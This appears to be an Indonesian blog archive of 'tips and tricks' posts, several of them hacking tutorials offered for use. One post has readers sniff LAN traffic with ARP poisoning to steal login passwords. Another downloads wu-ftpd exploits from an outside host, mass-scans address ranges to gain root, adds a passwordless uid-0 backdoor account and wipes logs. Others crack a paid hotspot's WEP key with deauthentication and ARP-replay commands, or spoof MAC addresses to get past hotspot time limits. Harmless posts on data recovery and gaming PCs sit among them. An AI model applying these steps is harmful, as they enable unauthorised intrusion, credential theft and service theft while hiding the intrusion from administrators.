Archive for the ‘TIPS & TRIK’ Category

Hey hey hey…terkadang lagi asik asik ngenet di hotspot tiba2 putus,…katanya sih dibatasi waktu biar user tidak dapat mengakses internet lagi…. Wah wah wah … repot banget sih…hanya ingin mendapatkan informasi di internet…seluruh kegiatan kita dibatasi…edun…alahhhhhhhhhhh … pembatasan diri…makanya kapan rakyat Indonesia bias mendapatkan informasi gratis di internet … kapan seluruh sector internet tidak dijadikan ajang bisnis…ini yang membuat rakyat Indonesia menjadi tidak percaya dengan internet … dan dibodohi oleh bangsa lain… di Negara maju access internet tidak dibatasi dan GRATIS…ya sekali lagi GRATIS … hanya disini saja dijadikan sumber inspirasi bagi para pebisnis agar meraup keuntungan sebanyak –banyaknya … padahal kita orang Indonesia sangat haus ilmu, apalagi soal computer, kapan lagi sih …. Hihihihihi … okay untuk mengatasi ini ada tips dan trick untuk merubah mac agar kita bias bebas berkeliaran di dunia cyber hihihihi…

Okay…. Langsung to the point aja yah…,pertama cari hotspot…kalo bisa menyediakan hotspot gratis…tapi dibatasi oleh jam ajah gituh…, terus maeennnnnnn aja ampe abis waktunya … ntar bakal ketemu gambar kayak gini:

nah bis itu bakal ada pembatasan akses seperti yang ditunjukkan gambar di atas .. atau ada tulisan “MAAF WAKTU BERINTERNET ANDA TELAH ABIS, SILAHKAN KEMBALI BESOK”, setannnnnnnn!!!!! kapan indonesia mo maju kalo internet dibatasi terus… yaaaa mo gak mau deh diakalin.

PROSES PEMBATASAN WAKTU

proses pembatasan waktu bisa dibatasi dari access point yang ada di kafe tersebut, dan biasanya pembatasan tersebut menggunakan MAC address, kenapa MAC Address???Kok gak IP Address??umh…kalo IP address bisa diganti sendiri kan lewat komputer, tapi kalau MAC, mungkin bisa di linux, tapi kalo di windows??? ya donlot lah program buat ngerubah MAC di:

http://tmac.technitium.com/tmac/index.html

kemudian install dan jalankan, maka akan muncul seperti gambar berikut:

kemudian klik tombolnya CHANGE MAC untuk mengganti mac address, lalu klik RANDOM MAC ADDRESS, seperti yang ditunjukkan gambar:

nah…ntar mac addressnya bakal dirandom sesuai dengan metode yang benar dari programnya, lalu klik CHANGE NOW!, langsung deh IP address anda berubah seperti pada gambar:

tunggu beberapa saat agar kompie merefresh perubahan ini kemudian buka lagi situs yang ingin dikunjungi, BANG BANG BANG!!!… dapet access 2 jam gratis lagi euy …

bisa dilihat tombol CLICK HERE itu jika ditekan kita mendapat free access, okay … mungkin sekian… dulu darri sayah …

PS:

di kutip dari situs virolog.org

Iklan

Cara hacking via LAN

Posted: Agustus 24, 2010 in TIPS & TRIK

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html

Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Hacking Server Dari shell

Posted: Agustus 24, 2010 in TIPS & TRIK

Berikut ini saya paparkan bagaimana cara menghack suatu server dari shell.
lets…Try For Hack…

Langkah pertama, kita masuk dulu ke shell kita, setelah kita berada di shell kita, kita download doloe exploits itu.www.utay-doyan.cc/ftp.tgz – http://www.utay-doyan.cc/xpost.tgz.
Jadi di shell kita tinggal ketik wget http://www.utay-doyan.cc/ftp.tgz .
Setelah file udah selesai di download ketik tar -zxvf ftp.tgz .
Begitu juga dengan exploits xpost.tgz, cara compile nya sama dengan compile ftp.tgz seperti di atas. perlu di ingat paling tidak kita membuka dua session telnet or ssh . satu untuk exploits ftp satu session untuk xpost.
Nahh, abis itu kita tinggal masuk ke directory ftp ketik cd ftp otomatis kita udah ada di directory ftp, and di session satunya buat xpost kita ketik cd xpost . Setelah kita udah berada di directory xpost contoh ketik ./scan 202.1 tekan enter. Maksud dari ./scan 202.1 adalah kita men scan ip 202.1 sampai selesai, abis kita enter tinggal tunggu aja nanti akan ada keterangan seperti ini :

[iwek@jarada xwurm]$ ./scan 211.240
Wait for Scanning 211.240 (3-5 minutes for class B)
Scan Result:
——————————–
211.240.28.66
211.240.38.1
211.240.48.62
211.240.48.190
211.240.56.62
211.240.56.254
211.240.56.126
211.240.61.30
211.240.61.62
211.240.61.126
211.240.61.158
211.240.61.238
——————————–
Results logged in wu-scan.log
[iwek@jarada xwurm]$

nahh itu hasil dari scan nyah tadi. tinggal kita ketik ./masswu wu-scan.log tunggu aja doloe, nttar kalo ada keterangan You Have Root In 211.240.56.254 berarti kemungkinan besar kita dapet jebol itu server.

Abis itu di session telnet yang satu nya, yang udah siap di directory ftp, kita ketik ./awu 211.240.56.254 apabila ada keterangan seperti di bawah ini :

[iwek@jarada ftp]$ ./awu 211.240.56.254
Checking 211.218.149.47 for vulnerable wu-ftpd 2.x < 2.6.2: Ok
7350wurm – x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

# trying to log into 211.240.56.254 with (ftp/mozilla@) … connected.
# banner: 220 root.ivines.co.kr FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow

Yess.. Berarti kita udah masuk server itu. coba ketik whoami apabila keterangnnya di bawah root berarti kita udah dapet acces root.

Mo adduser ? nahh nttar ketik /usr/sbin/adduser ganjen -g wheel -s /bin/bash -d /home/ganjen tekan enter, abis itu buat password nyah ketik

passwd ganjen tekan enter , abis itu ketik kanjud tekan enter abis itu ketik lagi kanjud , nb: ketik kanjud dua kali itu kegunaan nya buat password kita

nahh apabila ada keterangan :

Changing password for user ganjen
passwd: all authentication tokens updated successfully

berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 -d /

abis itu ketik lagi

passwd -d crit

abis ketik itu kita otomatis udah dapet acces root

nahh semuanya udah selesai khan… jangan ampe lupa apus jejak supaya ga cepet matek shell nyahh… abis semuanya kelar kita udah add user udah dapet acces root nttar ketik :

cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

udah di ketik semua ? udahh… tekan ctrl d . udah deh … keluar khan… crottt… hiahaihaia mudah khan 🙂 nice to try. Buat exploits lain kamu bisa cari di site-site laen…

CARA MENGEMBALIKAN DATA YG HILANG
Apakah Anda pernah secara tidak sengaja menghapus file Anda, kemudian sudah meng-empty recycle bin? Atau Anda telah mem-format hard disk tapi ingin data Anda kembali? Atau data hilang / rusak karena virus? Atau karena komputer mati atau restart tiba-tiba? Ada cara untuk mengembalikan data yang hilang, yaitu dengan satu software yang sangat lengkap, yaitu Ontrack EasyRecovery Professional. Inilah cara-cara mengembalikan data Anda yang hilang .
Pertama Anda harus download dulu software tersebut, silakan klik di sini untuk download software Ontrack Easy Recovery Professional. Software ini menyediakan sebuah solusi yang sangat komplit sehubungan dengan data yang hilang atau urusan recovery data yang hilang karena:
  1. Virus.
  2. Sektor yang tidak terbaca
  3. Kesalahan aplikasi, system, atau shut down yang tidak normal.
  4. Kerusakan pada critical area.
  5. Ter-format
  6. Penyebab lain yang memungkinkan hilangnya data.
Software ini di-install pada Windows 98 SE, Me, 2000, or XP, dan dapat me-recover data untuk pada semua sistem windows. Software ini memiliki empat feature utama, yaitu:
  1. Disk Diagnostics, yaitu tool untuk mengecek kondisi hardisk Anda apakah masih bagus atau tidak.
  2. Data Recovery, yaitu tool untuk mengembalikan data / file karena terhapus, terformat, dan sebagainya.
  3. Email Repair, yaitu tool untuk mengembalikan data email Outlook Express yang terhapus atau rusak.
  4. File Repair, yaitu tool untuk memperbaiki data / file Microsoft Word, Excel, Access, PowerPoint, dan ZIP (winzip) file yang rusak karena virus atau sebab lain.
Mari kita lihat satu per satu fasilitas yang ada dalam software ini.
1. Disk Diagnostics
Data hilang - Disk Diagnostics
Tool yang ada dalam Disk Diagnostics ini adalah:
  • Data Advisor, untuk membuat disket recovery.
  • Drive Tests, untuk mengetes kondisi fisik dari hard disk (disk drive).
  • Jumper Viewer, untuk melihat posisi jumper pada hard disk.
  • Partition Tests, untuk mengecek kondisi partisi hardisk.
  • Size Manager, untuk melihat kapasitas hard disk
  • SMART Tests, digunakan untuk mengetes kondisi Self-Monitoring, Analysis and Reporting Technology pada suatu hardisk.
2. Data Recovery
Data hilang - data recovery
Tool-tool yang ada dalam Data Recovery ini adalah:
  • Advanced Recovery, untuk mencari data yang sudah tidak dapat di-recover dengan tool lain, yaitu karena ter-format, ter-partisi, virus, atau hal lain.
  • Deleted Recovery, untuk mencari data yang sudah dihapus. Ini adalah tool yang paling sering dipakai penulis.
  • Format Recovery, untuk mencari data pada hard disk yang sudah di-format.
  • Raw Recovery, untuk mencari file yang hilang berdasarkan signature.
  • Resume Recovery, semua proses recovery dapat dihentikan sementara dan dilanjutkan pada lain waktu.
  • Emergency Media, untuk membuat disket atau CD yang digunakan untuk me-recover data / file hilang.
3. Email Repair, digunakan untuk mengembalikan data email Outlook dan Outlook Express yang hilang.
Data hilang - email repair
4. File Repair, digunakan untuk mengembalikan file-file Microsoft Office dan ZIP yang rusak. Tool ini dapat memperbaiki file Microsoft Word, Excel, Access, PowerPoint, dan ZIP (winzip) file yang corrupt / rusak karena virus atau sebab lain.
Data hilang - file repair
Data atau file yang hilang lebih sulit di-recover jika:
  1. Anda menambahkan file baru setelah Anda menghapus atau memformat hard disk.
  2. Anda menggunakan FAT32 dalam Windows XP.
Demikian cara mengembalikan data yang hilang dengan software EasyRecovery Professional. Semoga data Anda bisa diselamatkan.

Tulisan ini merupakan pengalaman pribadi saya dalam rangka mencari akses internet gretong alias gratis yang sinyal hotspotnya bersliweran disekitar kamar kos. Sebenarnya pada waktu launching pertama kali hotspot ini hanya menggunakan proteksi MAC Address, tapi sebulan belakangan memakai proteksi WEP (Wired Equivalent Privacy) Keys, karena sebenarnya hotspotnya hanya ditujukan kepada mereka yg membayar langganan perbulan. Apa boleh buat, namanya juga anak kos, hehehehe… (Ngeles…). Lagian saya juga pernah dengar adminnya ngomong “Santai aja, hotspot ini aman, nggak bakalan ada yg bisa jebol”. Dengan dasar itu juga lah saya merasa tertantang untuk mencicipi proteksi yang di gunakan sang admin.

Akhir kata, tulisan ini bukan ditujukan untuk merusak tapi hanya sekedar pengingat saja, bahwa tidak ada didunia ini sistem yang 100% aman. kalaupun ditujukan untuk merusak, ya silahken. resiko ditanggung penumpang, eh penonton, eh pembeli… (Halah…)

Langsung saja, eralatan tempur yang harus kita siapkana adalah:
1. Sebuah PC atau Lepi (Leptop/Notebook)
2. Sebuah Wireless Adapter atau Wi-Fi yang support mode Monitoring dan injection.
3. Linux Live CD atau Live USB Bactrack versi 2.0 atau, 3.0 (Dianjurkan yang sudah terinstal modul Aircrack-ptw)
4. semangat untuk mencoba dan pusing ria.

Mungkin masih ada pertanyaan tentang Wireless Adapter yang support mode Monitoring dan Injection. yang dimaksud disini adalah, monitoring yaitu Wi-Fi bisa digunakan untuk melihat/menangkap trafik yang bersebaran diudara dan yg dimaksud mode injection adalah bisa digunakan untuk menyisipi paket pada trafik yang bersliweran dari dan menuju akses point (AP). Chipset Wi-Fi yang dianjurkan adalah atheros atau RaLink. Pada tutorial ini Saya menggunakan Wi-Fi merek TP-Link TL-WN321G dengan chipset RaLink. Yang pada waktu itu saya beli dengan harga Rp. 183.000,- supaya sinyal yang ditangkap Wifi lebih kuat, bisa menggunakan antena kaleng (tutorial pembuatannya cari diinternet). Saya juga menggunakan antena kaleng pada waktu beraksi.

Setelah Wi-Fi nya siap, langkah selanjutnya adalah booting Kompi atau Lepi anda dengan Backtrack. terserah mau yang CD atau USB. yang penting pake Backtrack (BT).

Langkah berikutnya adalah mengecek Wifi kita, apakah sudah aktif atau belum dengan cara:

> Masuk konsole (klik tanda hitam di sebelah kiri bawah) atau pencet Alt+F2 kemudian ketik “konsole”
> Setelah konsole terbuka, ketik “ifconfig”

Nah, kalau sudah aktif maka disitu akan muncul nama wifi anda. Nama untuk setiap Wifi berbeda-beda, sebagai contoh:
chipset Atheros dikenal dengan “ath0”, Intel dengan “wifi0”, raLink dengan “rausb0”. nah disini Wifi saya dikenali dengan “rausb0”. yang nantinya akan selalu saya gunakan pada tutorial ini. Kalau Wifi anda belum aktif, ketik “iwconfig rausb0 up”. Saya anggap sekarang udah aktif yah…
Untuk mengaktifkan mode monitoring ketik:

“airmon-ng start rausb0”

Untuk memonitor jaringan hotspot bisa menggunkan Kismet atau Airodump, Disini saya coba menggunakan Airodump dengan menjalankan perintah:

“airodump-ng rausb0”

Kemudian akan tampil semua jaringan yang terdeteksi oleh wifi kita. Disitu terlihat ada “SANET”, nah itulah calon korban kita. Data yang perlu diperhatikan adalah channel yang digunakan dan BSSID. Disitu terlihat:
channel = 2
BSSID = 00:1E:E5:7F:1B:8F
catat data tersebut baik-baik.

Langkah selanjutnya adalah menyimpan trafik pada Akses Point “SANET” kedalam sebuah file, file inilah yang nantinya akan digunakan untuk mendapatkan WEP Keys. caranya, buka konsole baru dan ketik:

“airodump-ng -channel 2 -bssid 00:1E:E5:7F:1B:8F -w hasil rausb0”

File tersebut nantinya terletak di /root dengan nama hasil-*.cap. Kita membutuhkan data yang banyak supaya proses cracking bisa dilakukan dengan cepat, Jika trafik yang terjadi terlalu sedikit kita bisa mengakalinya dengan mengirim data sampah, caranya, buka konsole baru dan ketik:

“aireplay-ng –arpreplay -b 00:1E:E5:7F:1B:8F -h 00:1D:0F:AF:4F:61 rausb0”

* 00:1D:0F:AF:4F:61 adalah client yang terhubung dengan AP “SANET”

Jika data yang didapat terasa masih kurang, bisa menggunakan teknik lain, yaitu “deauthentication” atau memutus koneksi client. Kenapa diputus? karena nantinya client pasti meminta koneksi lagi dan pada waktu “connecting” inilah trafik yang terjadi padat. caranya, buka konsole baru dan ketik:

“aireplay-ng -deauth 5 -c 00:1D:0F:AF:4F:61 -a 00:1E:E5:7F:1B:8F raub0”

Sementara proses pengumpulan data berlangsung, kita sambil memecahkan/cracking WEP Keys dengan cara buka konsole baru dan ketik:

“aircrack-ng hasil*.cap”

Tunggu beberapa saat, jika data yang ditangkap banyak, proses ini akan berlangsung cepat. lama waktu yang saya butuhkan pada saat cracking ini sekitar 30 menit, karena data trafiknya kurang begitu banyak.

Jika kita menggunakan “aircrack-ptw” dapat mempercepat proses cracking, caranya ketik:

“aircrack-ptw hasil*.cap”

Nah pada gambar diatas, terlihat bahwa proses cracking sudah berhasil. Inilah WEP Keys yang kita cari:

CE:C6:62:D5:99:52:87:65:7D:51:54:97:5E atau
CEC662D5995287657D5154975E

Akhir kata, selamat mencoba.

Good Luck…!!!

gamer

biasanya para gamer selalu ingin mendapatkan kepuasan pada saat bermain game, namun seiring berjalannya waktu teknologi semakin maju sehingga membuat kualitas game dan device yang digunakan pun ikut meningkat, maka dari itu para gamer berusaha untuk memenuhi kebutuhan (hobi/ ke maniac-an..hahaha) mereka.

dengan adanya keadaan tadi.. maka gamer tersebut di bagi menjadi 3 kelas berdasarkan tingkat ekonominya

  • PC Gamer Kelas High-End (idaman)

kelas ini hanya ditujukan pada anda yang ingin mengikuti tren teknologi terbaru yang tidak ambil pusing masalah biaya yang akan dikeluarkan(hmm.. orang kaya). meskipun memang mahal, hasil kinerja PC High-End ini benar-benar powerfull dan sesuai dengan teknologi terkini ( ga ketinggalan jaman.ehehe). terkadang akan sedikit sulit untuk mendapatkan Spesifikasi PC yang diinginkan

Namanya juga komputer idaman, jadi kinerja mesti sempurna (yah setidaknya untuk saat ini saja). Beberapa tahun kedepan juga harganya akan turun.

spesifikasi yang bisa anda ambil sbb:
high-end

  • Kelas Middle-End (Ideal)

Kelas ini ditujukan untuk gamer yang tidak ingin ketinggalan perkembangan komputer. mungkin dengan dana sekitar 5-8 jutaan rupiah, para gamer sudah bisa membeli PC yang lebih dari cukup dan bahkan dapat bertahan hingga 2-3 tahun mendatang. ini contoh spesifikasi yang dapat diambil:
middle-end

  • Kelas Low-End (standar/Ekonomis)

jika dana anda masih terbatas, mungkin anda bisa memilih PC yang berada pada levl standar. Meskipun berada pada level standar namun banyak game yang beredar saat ini dapat dimainkan pada komputer dengan contoh spesifikasi seperti ini:
low-end

Semoga spesifikasi komputer diatas dapat membantu dan memberikan kenyamanan dan kestabilan dalam bermain gamesehingga dapat berjalan pada game-game baru dengan mulus. Untuk menguji seberapa cepat kinerja VGA anda, anda dapat mengujinya menggunakan software tool seperti: Aquamark, 3Dmark2001 untuk DirectX8, 3Dmark03, dan 3Dmark05, alternatif lainnya pakailah SiSoftSandra04 untuk mengetahui spesifiksi komputer kita secara detail..

Hidup Gamer….!!!!! ^^

Membobol Password Hotspot

Posted: Agustus 8, 2010 in TIPS & TRIK
Hari gini internet kabel ?

Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut.
Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis, sangatlah terbatas.
Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.
Apa itu MAC Adress ?
In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).
Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita.
Contoh kasus adalah HotSPOT di Food Court Plasa Semanggi.
Pada HotSPOT FoodCourt Plasa Semanggi , sang penyedia layanan Internet Wireless, membatasi penggunaan Internet gratis hanya selama 3 Jam, setelah itu anda tidak dapat mengakses internet lagi, dan baru akan dapat mengakses lagi di hari esok. Jenis proteksi yang digunakan adalah MAC Address Filtering.
Bagaimana menjebol Proteksi dengan MAC Address ?
Ada sebuah tools yang sangat bermanfaat untuk anda.Tools itu bernama K-MAC.Anda dapat mendownloadnya disini : http://indoupload.net/files/8318/k-mac.zip

Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address ! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kembali
Lalu bagaimana bila akses Wireless dibuat dengan proteksi yang lain ? Seperti WEP Keys dan WPA/WPA2 Keys ? Itu akan saya bahas lain kali
Happy Free Surfing !